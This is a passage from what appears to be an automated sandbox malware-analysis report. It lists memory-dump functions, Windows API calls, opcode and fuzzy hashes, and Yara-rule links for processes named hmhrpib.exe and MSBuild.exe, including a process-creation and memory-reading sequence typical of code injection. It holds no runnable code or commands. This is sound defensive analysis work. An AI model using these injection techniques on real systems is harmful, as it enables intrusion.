              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7f56a5a382ed4aa56914f5acde8d2a5020a3527940fbe0552621debbc45fea98
              • Instruction ID: 1016424ea6f03c3fc28bdf20132f8e47c8e6cc53257c6b88263d6106054fdfee
              • Opcode Fuzzy Hash: 7f56a5a382ed4aa56914f5acde8d2a5020a3527940fbe0552621debbc45fea98
              • Instruction Fuzzy Hash: 6CB012312442081F279056B16809E2233CC66C050934000A4980CC0501F910D4D0A644
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0EA0, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c821208809a60509370af47e7fe4c19ffe8fffababcc10fe0a1e9e329d5721a4
              • Instruction ID: ce860bd12ae8ace29d521c6aa1d67fbc06c679fd897d12cb23eb9388198b0218
              • Opcode Fuzzy Hash: c821208809a60509370af47e7fe4c19ffe8fffababcc10fe0a1e9e329d5721a4
              • Instruction Fuzzy Hash: 3BB01232A4464C4BCDD033F4E40C01C775D0F401007C40015590D43A06FD7878004A59
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 06CD4110, Relevance: 1.4, Strings: 1, Instructions: 117COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: c686933a477ba3ccb2502fe104fec5860e72b83f25a361302e79fe08d64b880c
              • Instruction ID: 9cc2b49da30ac8b7d6b59bac05306e5ec00202cff650e111176a643d8cbff8c5
              • Opcode Fuzzy Hash: c686933a477ba3ccb2502fe104fec5860e72b83f25a361302e79fe08d64b880c
              • Instruction Fuzzy Hash: E451C0B4D01208DFDB15DFA9D994AAEBBF2FF49300F20816AE905A7365D734AD01CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD42A0, Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1828475128f1e764f688b55d1cd5bdbc776b68e0988cfb73671a3d0fe705198c
              • Instruction ID: 1dd2d30455ddeb5a38e4ad8eb34bf4068d9fc71156be1b3cc5df700e88243840
              • Opcode Fuzzy Hash: 1828475128f1e764f688b55d1cd5bdbc776b68e0988cfb73671a3d0fe705198c
              • Instruction Fuzzy Hash: AE0175309053099BCB24EF68D849D6DBFB1FB42749F10D259E905A7259CF31AE04CB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD52B1, Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97daa63737ca3d3776df3b3edbb92afb6091701441a7791bfb62431b6ddfa54a
              • Instruction ID: c8af627572212bb8f93255dd76744971f25e4f9abe2a385ef8930110df7a9ac8
              • Opcode Fuzzy Hash: 97daa63737ca3d3776df3b3edbb92afb6091701441a7791bfb62431b6ddfa54a
              • Instruction Fuzzy Hash: 64016971D062498ECB45CFBA98487FEBFF4EB4A221F54A16AD558F3190D3304246CB68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD52C0, Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9c63ff6487570b07634aec49a2860b86dc37a5196e49c01dd51d833144c35455
              • Instruction ID: 7f48214cc221f6a6320cef8f9888bfcae36df1f16d50045d84f2b9dcd32ad25c
              • Opcode Fuzzy Hash: 9c63ff6487570b07634aec49a2860b86dc37a5196e49c01dd51d833144c35455
              • Instruction Fuzzy Hash: 3201C471D112189EDB54DFBA9848BEEBFF8EB4A211F54A42AE508F3240E7345644CB68
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: hmhrpib.exe PID: 6376 Parent PID: 3424 hmhrpib.exeCOMMON

              Executed Functions

              Function 02F11450, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 02F1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02F118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F11960
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 0e0c1f0854972cb0b8b111aa65489d29d9002ae4c88cc3b85f6e7afb3584bd52
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 47024B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F50448AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F10950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02F10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02F10C1F
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: 04d0a6c51d010c2d90088deb031727e81730b81c60a4c3156ce8ff28ee7549dd
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: B5A1F035E00249EFDF14CFE4C985BADBBB1EF08355F60849AEA10BA2A0D7755A81DF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F10034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 02F105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 02F105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F10605
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 5b6f82afa4f19e7e8ed4e9742af0cb87ba6dc42dff5e3dd75d013b1d3426825a
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 6F525D35E50258EEEB60CBA4EC55BFDB7B5AF48710F50449AEA08EA2A0D7705EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F11C75, Relevance: 1.7, APIs: 1, Instructions: 431COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction ID: f067571a1418877a6624ed7087d5e08dcb8413a77f4fbcf759377d687eca6414
              • Opcode Fuzzy Hash: 7cf3e08ff55b8ae7de8de1e7d63aac67220cabf838a571d0e20aa61da1f1d5e0
              • Instruction Fuzzy Hash: BCF11026E50398A9EB60CBE4EC55FFDB3B5AF48B50F105497EA0CEE190E7704A80DB15
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F1126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 0ed5d90a96634ea9f89f7d1cf6f0a10d53323473acfa44cc33b6114d1b48ce1d
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: FBD05EB1C5034CBFDB08EFE1CC8685DBF7DDB05341F50819AAD0067100DA759B109B94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: MSBuild.exe PID: 6800 Parent PID: 968 MSBuild.exeCOMMON

              Executed Functions

              Function 00E52477, Relevance: 5.7, Strings: 3, Instructions: 1913COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.713244797.0000000000E52000.00000040.00000001.sdmp, Offset: 00E52000, based on PE: false
              Similarity
              • API ID:
              • String ID: 1'r<$Atqp$Ppq
              • API String ID: 0-1036205073
              • Opcode ID: 6a43edb41d14957b809b827357ae494026fe23dd3d41fa4983b53f345f830353
              • Instruction ID: e5b3bb47b8f91d2544f64101a6ca528ff9396c0847a547f51a4c0170a9b30468
              • Opcode Fuzzy Hash: 6a43edb41d14957b809b827357ae494026fe23dd3d41fa4983b53f345f830353
              • Instruction Fuzzy Hash: 98525A6281E3C14FC727473458651957F70AE63316B5E69CFCAC0EF1A3E219894EC3A6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A533, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E5A5E9
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 42f7208b8aa98b87d8f5aa3e9ab12098b1b9add4b0a0cc401506d157dd2400ac
              • Instruction ID: c40632cf4003566b8317d2d86d879d1d191f2d3fa01792f05ba507fe5c1a2cf7
              • Opcode Fuzzy Hash: 42f7208b8aa98b87d8f5aa3e9ab12098b1b9add4b0a0cc401506d157dd2400ac
              • Instruction Fuzzy Hash: A83190B1505380AFE722CF25CC44F66BFE8EF05314F0885AAE9849B252D271E909CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A640, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A6D5
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 81b70b40cb3d48978eddd9527407a7e584083cf8e053a3004bc029795b88aa5e
              • Instruction ID: 26bf6fe4fd616913660b93f97b456259ba98eece62d8346e89eb976b93a54c2e
              • Opcode Fuzzy Hash: 81b70b40cb3d48978eddd9527407a7e584083cf8e053a3004bc029795b88aa5e
              • Instruction Fuzzy Hash: 2221F8B65087806FE7138B25DC44FA6BFB8EF46720F0885DBED849B153D224A909C7B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A56A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E5A5E9
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e9755babbee94327680c92173b211f9bccd705475fc97502cdc5d917b00d6953
              • Instruction ID: 1019f5f8348c23eea73297259d865e75030f7c3592533a0cc544107972f67d9a
              • Opcode Fuzzy Hash: e9755babbee94327680c92173b211f9bccd705475fc97502cdc5d917b00d6953
              • Instruction Fuzzy Hash: 05216071500700AFE721CF65CC44B56FBE8EF04310F18896AED859B651D775E409CA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A710, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
              Download Yara Rule
              APIs
              • WriteFile.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A7A1
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 7b64b9efbd64b335ed5e165efab2500afc75178dfe62ca0f2ee90ba9cfb27006
              • Instruction ID: 472c08f9d0cc1bb92da6e8e4dc76a2479c64bb6114d6aaa3a50a9053fd6ccbdd
              • Opcode Fuzzy Hash: 7b64b9efbd64b335ed5e165efab2500afc75178dfe62ca0f2ee90ba9cfb27006
              • Instruction Fuzzy Hash: 022192B1509380AFE7228F25DC44F56BFB8EF46314F0885ABE9849F153C225A809CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5AC1C, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 00E5ACB2
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: LanguageName
              • String ID:
              • API String ID: 2060303382-0
              • Opcode ID: 41f53398114e36a5bb64a92834b4fe2783706d28d626f5450d62ef523874c103
              • Instruction ID: f76718631cfe3000169d126521022b0acf8067dde67bfa5fd4921018e2234952
              • Opcode Fuzzy Hash: 41f53398114e36a5bb64a92834b4fe2783706d28d626f5450d62ef523874c103
              • Instruction Fuzzy Hash: FD2192755097816FD3138B25DC51B62BFB8EF87B20F0981DBE8848B553D224A91AC7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A7EB, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00E5A863
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoSizeVersion
              • String ID:
              • API String ID: 1661704012-0
              • Opcode ID: 8ea16b13d923b683942d70de7e873fe0116257849101e4a3cd02a49ffcdc11e0
              • Instruction ID: cf91b0f864d6cff3b612fc3adffe5b2546195c0a9b63e599884916109cec6f34
              • Opcode Fuzzy Hash: 8ea16b13d923b683942d70de7e873fe0116257849101e4a3cd02a49ffcdc11e0
              • Instruction Fuzzy Hash: E421AE714093C45FEB12CB29DC85B92BFE4EF06314F0D85EADC849F153D2649809CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A336, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 00E5A39C
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 919ca33ec7b91fc89eb393fe32d138bbe2e1066f9b43a9cdab19c1b99cec7fdc
              • Instruction ID: c82fbd48f7794b834d872ff97809ab2103cd34894ae80f1124c1fb3ed399dbcd
              • Opcode Fuzzy Hash: 919ca33ec7b91fc89eb393fe32d138bbe2e1066f9b43a9cdab19c1b99cec7fdc
              • Instruction Fuzzy Hash: AA216D715093C09FD7128B25DC85A56BFB4EF06224F0984EBED85CF163C278A848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A1F4, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNELBASE ref: 00E5A269
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ConsoleOutput
              • String ID:
              • API String ID: 3985236979-0
              • Opcode ID: a011b2a651a3929691d74b4394e9ce9354688208455f53eaa005d072e7e2669b
              • Instruction ID: 50762f45a21d4ea39e1089610eb373bcf28ac50ca668e5366e11e0bcb94129b1
              • Opcode Fuzzy Hash: a011b2a651a3929691d74b4394e9ce9354688208455f53eaa005d072e7e2669b
              • Instruction Fuzzy Hash: 74219A7540E7C05FD7138B65CC95682BFB4EF07224F0E80EBD8848F1A3C268A908CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A742, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
              Download Yara Rule
              APIs
              • WriteFile.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A7A1
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: a40ca5d9f23115fd0d63142cd40a6488ed751e6b57efaf4e04376b5512626789
              • Instruction ID: df091b9c66f7aae2fab296112d7a7c3636e8cc3925145137498f405f0f25c02e
              • Opcode Fuzzy Hash: a40ca5d9f23115fd0d63142cd40a6488ed751e6b57efaf4e04376b5512626789
              • Instruction Fuzzy Hash: 2211C4B1500304AFEB21CF55DC84F96FBA8EF48320F18896BED459B546D274E408CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A8B4, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
              Download Yara Rule
              APIs
              • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 00E5A919
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoVersion
              • String ID:
              • API String ID: 2427832333-0
              • Opcode ID: 0fcf2a78993ab40c44a13627df4be68eed8b6968cb0d654d8beba5d002b610c8
              • Instruction ID: ad160cb55077aef084a6c3f11256e2ad261d7fd5b0dae823fb3426564d1dde0d
              • Opcode Fuzzy Hash: 0fcf2a78993ab40c44a13627df4be68eed8b6968cb0d654d8beba5d002b610c8
              • Instruction Fuzzy Hash: AA11B2B2505384AFDB218F15DC44F62FFB8EF55724F09849EED859B653D221E808CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A3E3, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00E5A448
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: dbb3a9ba14ac29d7e55504e6e5b1631e583e1a670a05eb7bbdf0f144fd23c4b3
              • Instruction ID: 0bfcfac1a75b7ddb678a85f5487318b6a5cb9e11d202a174d3da07756825d255
              • Opcode Fuzzy Hash: dbb3a9ba14ac29d7e55504e6e5b1631e583e1a670a05eb7bbdf0f144fd23c4b3
              • Instruction Fuzzy Hash: 2F118BB540D3C05FEB128B259C84A62BFB49F47214F0980DAED858F2A3D269A809D772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A682, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A6D5
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 5a4c838596d6fefc16209e2b4765eb1f2602fecf83c14c83b80ad6cb01b478bc
              • Instruction ID: 601c09b9d8eed1a8430f6b8646c1209b990844757d4110198f9c5cc132f4bce6
              • Opcode Fuzzy Hash: 5a4c838596d6fefc16209e2b4765eb1f2602fecf83c14c83b80ad6cb01b478bc
              • Instruction Fuzzy Hash: 3201D671500304AEE721CF15DC85BA6FBA8EF44721F588566EE44AB646D278E408CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A8D6, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
              Download Yara Rule
              APIs
              • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 00E5A919
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoVersion
              • String ID:
              • API String ID: 2427832333-0
              • Opcode ID: 7edf4f3b755ec6ae2bbb9fd9eda735cabc32bc51b5dc8bb49505b6d8e804db1e
              • Instruction ID: 562087e8d021a3cd037838ef4f1433fccf8d644f04b703154d727752f06c3d48
              • Opcode Fuzzy Hash: 7edf4f3b755ec6ae2bbb9fd9eda735cabc32bc51b5dc8bb49505b6d8e804db1e
              • Instruction Fuzzy Hash: 3B0180756002449FDB208F16E884B96FBA4EF54321F08C56EDD459BA52D275E408DA62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A826, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
              Download Yara Rule
              APIs
              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00E5A863
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoSizeVersion
              • String ID:
              • API String ID: 1661704012-0
              • Opcode ID: 7cd5791afa66ffcf0a285ab975f8ff3a63a843e9fa79a9abc69f71b1a5a7e0fc
              • Instruction ID: 96811565bb9ae9f9891ec74f4fdc7c199e9e48e5f88dc1ea4960cbd3a4c62685
              • Opcode Fuzzy Hash: 7cd5791afa66ffcf0a285ab975f8ff3a63a843e9fa79a9abc69f71b1a5a7e0fc
              • Instruction Fuzzy Hash: E70192719002009FEB20CF16D888755FB94EF04321F0889BADC449B606E274D809CA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5AC62, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 00E5ACB2
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: LanguageName
              • String ID:
              • API String ID: 2060303382-0
              • Opcode ID: 67b82c1cdd5068967c0d0109c63dcf27dde2f9e949fc63f451067a09174f974d
              • Instruction ID: c715bb5cd23a58db198ed03005907777e22a7e109257a0bceb72875743bf0e9a
              • Opcode Fuzzy Hash: 67b82c1cdd5068967c0d0109c63dcf27dde2f9e949fc63f451067a09174f974d
              • Instruction Fuzzy Hash: 1401A271600601ABD314DF1ADC82F26FBA8FF89B20F14811AED085B741D231F516CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A36A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 00E5A39C
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: bc95b5251f62295b43bf6135329676dfdafe97d991551d4490e138960a99bea2
              • Instruction ID: e54709e66e2f54d67e12afc34e330979199724cb58ee7247b64bde80b2a5358b
              • Opcode Fuzzy Hash: bc95b5251f62295b43bf6135329676dfdafe97d991551d4490e138960a99bea2
              • Instruction Fuzzy Hash: 2401D471600340CFDB208F19D884759FB94DF04325F08C4BADC499F646D274D408CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A416, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00E5A448
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: c9f6e91af157c099b09c5a3127f3d6eb17a0013e056732cb4b4b86ed4dce3ec9
              • Instruction ID: 6baceca2d47d6efe464a11e85a5af1721d075325b03d3db3a571782f00e6a5d9
              • Opcode Fuzzy Hash: c9f6e91af157c099b09c5a3127f3d6eb17a0013e056732cb4b4b86ed4dce3ec9
              • Instruction Fuzzy Hash: 21F0AF345007408FDB20CF46D889761FFA4EF04721F1CC9AADD495F656D2B9A848CAB3
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E5A23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNELBASE ref: 00E5A269
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ConsoleOutput
              • String ID:
              • API String ID: 3985236979-0
              • Opcode ID: 66ac3cbf7f5c01b6776c11313359dc8da965cee278f3fe3ef3559a4db972aad1
              • Instruction ID: 1a3dfb9884705e6cbaa624d8c6fa05252e777e7d4628f45f88dd44976fcc8d14
              • Opcode Fuzzy Hash: 66ac3cbf7f5c01b6776c11313359dc8da965cee278f3fe3ef3559a4db972aad1
              • Instruction Fuzzy Hash: E1F0AF349043448FDB208F46D885761FFA0EF04721F18C5AADD495F656D279A848CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05042670, Relevance: 1.5, Strings: 1, Instructions: 207COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: c88a83f9016903f1ab5dd42f6ac02201ddba630c86a71238bd8d2cf07971fe53
              • Instruction ID: d41a849bcedf7ad3e76d994244fc01e948202be364cf3e72b4f793af0de3506a
              • Opcode Fuzzy Hash: c88a83f9016903f1ab5dd42f6ac02201ddba630c86a71238bd8d2cf07971fe53
              • Instruction Fuzzy Hash: 2771DC78B01212DFD324DB26E954B2EB7E2BF84311F01857AE54A9B691CB70EC85CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05041890, Relevance: 1.4, Strings: 1, Instructions: 163COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: hV
              • API String ID: 0-4113920308
              • Opcode ID: 79df73ac967056e1a194487ded156755101b3ab040b11b4c924a9982390499eb
              • Instruction ID: c21c4ca83451b71061f211dd903cc861b70c44fba3ca8219be25d123da6bd4af
              • Opcode Fuzzy Hash: 79df73ac967056e1a194487ded156755101b3ab040b11b4c924a9982390499eb
              • Instruction Fuzzy Hash: C151AC757002458FCB00DF69D844AAE7BE6BF84350F05846AE819EB3A1DB70ED89CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0504014F, Relevance: 1.3, Strings: 1, Instructions: 75COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: e2eb5bf574399985f6b9a9a8f9a365f4ffdd6ca098a91aa8726823436cc22c3a
              • Instruction ID: 515570658a9544960a6ba48845c7f65471f9443fb28256ab11c2a9510786e4b1
              • Opcode Fuzzy Hash: e2eb5bf574399985f6b9a9a8f9a365f4ffdd6ca098a91aa8726823436cc22c3a
              • Instruction Fuzzy Hash: FA213272E011089FDB45DFA6EC549DEBBFABF88211F04812AE546F3260DA3049458B51
              Uniqueness

              Uniqueness Score: -1.00%

